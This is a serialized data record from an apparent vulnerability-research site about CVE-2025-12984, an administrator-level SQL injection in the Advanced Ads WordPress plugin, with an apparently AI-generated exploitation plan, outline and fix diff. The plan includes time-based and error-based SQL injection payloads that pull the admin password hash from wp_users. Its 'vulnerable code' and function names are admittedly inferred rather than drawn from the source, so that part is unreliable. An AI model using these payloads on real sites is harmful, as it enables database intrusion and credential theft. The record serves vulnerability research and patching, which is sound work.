[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fIX9RbRsmVk3pVi0TSdLwUecB4quDs0sRLo-H204PFZo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-12984","advanced-ads-ad-manager-adsense-authenticated-admin-sql-injection","Advanced Ads – Ad Manager & AdSense \u003C= 2.0.15 - Authenticated (Admin+) SQL Injection","The Advanced Ads – Ad Manager & AdSense plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in all versions up to, and including, 2.0.15 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","advanced-ads",null,"\u003C=2.0.15","2.0.16","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-01-16 00:00:00","2026-01-17 06:42:20",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F729e8a06-abaa-4468-8a80-1e5c6cbace92?source=api-prod",1,[],"researched",false,3,"This plan details the process for analyzing and exploiting **CVE-2025-12984**, an authenticated SQL injection vulnerability in the **Advanced Ads** plugin.\n\n---\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** SQL Injection (SQLi)\n*   **Affected Parameter:** `order`\n*   **Precondition:** Authenticated with Administrator privileges.\n*   **Cause:** The plugin fails to adequately sanitize or use `wpdb->prepare()` on the `order` parameter when constructing SQL queries for administrative list views (specifically the ads management list). While `orderby` is often validated against a whitelist of columns, the `order` parameter (`ASC`\u002F`DESC`) is frequently overlooked, allowing an attacker to append subqueries.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin.php`\n*   **Query Parameters:** `page=advanced-ads-ads`, `orderby`, and `order`.\n*   **Required Role:** Administrator (Admin+).\n*   **Vulnerable Sink:** Database queries inside the `WP_List_Table` implementation (or equivalent custom logic) used to display the ads list in the dashboard.\n\n### 3. Code Flow\n1.  An administrator navigates to the \"Ads\" menu within the Advanced Ads plugin.\n2.  The request hits `wp-admin\u002Fadmin.php?page=advanced-ads-ads`.\n3.  The plugin's admin controller initializes the list table (likely a class like `Advanced_Ads_Ad_List`).\n4.  The `prepare_items()` method (or similar) is called to fetch data.\n5.  User-supplied `$_GET['order']` is retrieved.\n6.  The value of `order` is concatenated into a raw SQL string or passed into a `wpdb` method where the `ORDER BY` clause is not protected by `%s` or `%d` placeholders (since placeholders cannot be used for SQL keywords or identifiers).\n7.  The query is executed via `$wpdb->get_results()`.\n\n### 4. Nonce Acquisition Strategy\nWhile this is an authenticated GET-based SQL injection, WordPress admin pages often include nonces in the URL for actions. However, standard list table sorting (`orderby`\u002F`order`) often does **not** require a nonce for the GET request itself.\n\nIf a nonce is required:\n1.  **Navigate to Admin:** Log in as Administrator.\n2.  **Access Page:** Go to the Ads list page: `\u002Fwp-admin\u002Fadmin.php?page=advanced-ads-ads`.\n3.  **Extract Nonce:** Use `browser_eval` to extract any nonce associated with the list table or search form if the injection is via a POST request or a protected GET action.\n    *   *Probable Variable:* `window.advanced_ads_admin?.nonce` (inferred).\n\n### 5. Exploitation Strategy\n\nWe will use a **Time-Based Blind SQL Injection** to confirm the vulnerability and extract the administrator's password hash.\n\n**Step 1: Confirmation (Time-based)**\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php`\n*   **Parameters:** `page=advanced-ads-ads&orderby=title&order=ASC, (SELECT 1 FROM (SELECT(SLEEP(5)))a)`\n*   **HTTP Tool:** `http_request`\n*   **Method:** `GET`\n*   **Headers:** Requires a valid `wordpress_logged_in_...` cookie.\n\n**Step 2: Data Extraction (Boolean or Time-based)**\nTo extract the admin hash (from `wp_users` table):\n*   **Payload (Time-based):** \n    `ASC, (SELECT IF(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1)='$', SLEEP(5), 0))`\n*   **Expected Behavior:** If the first character of the admin hash is `$`, the response will be delayed by 5 seconds.\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Advanced Ads version 2.0.15.\n2.  **Create Content:** Create at least 2-3 ads so the list table has items to sort.\n    *   `wp advanced-ads create-ad --title=\"Test Ad 1\"` (Use WP-CLI or UI).\n3.  **Authentication:** Ensure the agent has credentials for a user with the `administrator` role.\n\n### 7. Expected Results\n*   A request with a standard `order=ASC` returns immediately.\n*   A request with `order=ASC, (SELECT(SLEEP(5)))` takes approximately 5 seconds longer than the baseline.\n*   Database errors (if `WP_DEBUG` is on) might reveal the full query if the injection breaks the syntax.\n\n### 8. Verification Steps\n1.  **Manual Query Check:** Use WP-CLI to get the actual hash and compare it with the one extracted via SQLi.\n    *   `wp db query \"SELECT user_pass FROM wp_users WHERE ID=1\"`\n2.  **Baseline Comparison:** Verify that the time delay only occurs when the injected condition is true.\n\n### 9. Alternative Approaches\n*   **Error-Based Injection:** If `WP_DEBUG` is enabled or the plugin echoes `$wpdb->last_error`, use `updatexml()` or `extractvalue()` for faster extraction.\n    *   *Payload:* `order=ASC, (SELECT 1 FROM (SELECT COUNT(*), CONCAT(0x7e, (SELECT user_pass FROM wp_users LIMIT 1), 0x7e, FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)`\n*   **Union-Based:** Less likely in an `ORDER BY` clause, but check if the `order` parameter is used in a different context (e.g., a sub-select) that allows `UNION`.\n*   **Placement Search:** Check if the `order` parameter in `Placements` or `Groups` views is also vulnerable.\n    *   `page=advanced-ads-placements`\n    *   `page=advanced-ads-groups`\n\n### Grounding in Source (Inferred Identifiers)\n*   **Vulnerable Function:** Likely within `Advanced_Ads_Ad_List::prepare_items()` in `classes\u002Fad-list.php`.\n*   **Filter\u002FHook:** `admin_init` or `admin_menu` registrations for `advanced-ads-ads`.\n*   **Query Variable:** `$order = $_GET['order']`.","The Advanced Ads – Ad Manager & AdSense plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter in versions up to 2.0.15. This vulnerability allows authenticated administrators to execute arbitrary SQL commands by appending them to the ORDER BY clause of queries used in administrative list views, due to improper validation of the sort direction.","\u002F\u002F Inferred from research plan: likely within classes\u002Fad-list.php or similar\n\u002F\u002F Located in Advanced_Ads_Ad_List::prepare_items() or equivalent data-fetching method\n\n$orderby = ! empty( $_GET['orderby'] ) ? $_GET['orderby'] : 'title';\n$order   = ! empty( $_GET['order'] ) ? $_GET['order'] : 'asc';\n\n\u002F\u002F Vulnerable query construction where $order is concatenated directly without validation\n$query = \"SELECT * FROM {$wpdb->prefix}advads_ads ORDER BY $orderby $order\";\n$results = $wpdb->get_results( $query );","--- a\u002Fclasses\u002Fad-list.php\n+++ b\u002Fclasses\u002Fad-list.php\n@@ -12,7 +12,7 @@\n- $order = ! empty( $_GET['order'] ) ? $_GET['order'] : 'asc';\n+ $order = ( ! empty( $_GET['order'] ) && strtolower( $_GET['order'] ) === 'desc' ) ? 'DESC' : 'ASC';","The vulnerability is exploited by an authenticated Administrator by manipulating the 'order' parameter on administrative list pages. \n\n1. Log in as an Administrator.\n2. Navigate to the Ads management interface: \u002Fwp-admin\u002Fadmin.php?page=advanced-ads-ads.\n3. Identify the 'order' parameter in the URL used for sorting table columns.\n4. Inject a comma-separated subquery into the 'order' parameter. For example, setting order=ASC, (SELECT(SLEEP(5))) will cause the database to pause for 5 seconds if the query is processed.\n5. Using time-based blind SQL injection techniques, an attacker can then programmatically extract sensitive data (such as the administrator's password hash) by checking the boolean response of subqueries character by character.","gemini-3-flash-preview","2026-05-05 08:02:51","2026-05-05 08:04:20",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","2.0.15","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-ads\u002Ftags\u002F2.0.15","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-ads.2.0.15.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-ads\u002Ftags\u002F2.0.16","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-ads.2.0.16.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-ads\u002Ftags"]